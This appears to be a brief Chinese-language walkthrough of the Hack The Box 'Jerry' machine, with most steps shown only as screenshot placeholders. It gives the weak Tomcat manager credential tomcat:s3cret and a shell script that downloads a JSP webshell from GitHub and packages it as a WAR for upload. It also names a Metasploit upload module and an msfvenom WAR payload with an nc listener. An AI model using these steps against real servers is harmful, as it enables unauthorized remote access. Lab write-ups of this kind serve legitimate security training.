HTB-Jerry

easy box.

首先nmap开路:
HTB-Jerry_第1张图片

找到8080端口:
HTB-Jerry_第2张图片

Tomcat字典:
https://raw.githubusercontent...
找到弱口令tomcat:s3cret

部署war包:
方法1:
官方walkthrough上的:
HTB-Jerry_第3张图片

#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war 

部署wshell:
HTB-Jerry_第4张图片
路径比较深
HTB-Jerry_第5张图片
拿到flag
image.png

方法2:
msf使用multi/http/tomcat_mgr_upload
HTB-Jerry_第6张图片
HTB-Jerry_第7张图片
image.png
HTB-Jerry_第8张图片

方法3:
msfvenom生成war包
image.png
上传war包后nc:
HTB-Jerry_第9张图片

你可能感兴趣的:(渗透测试安全)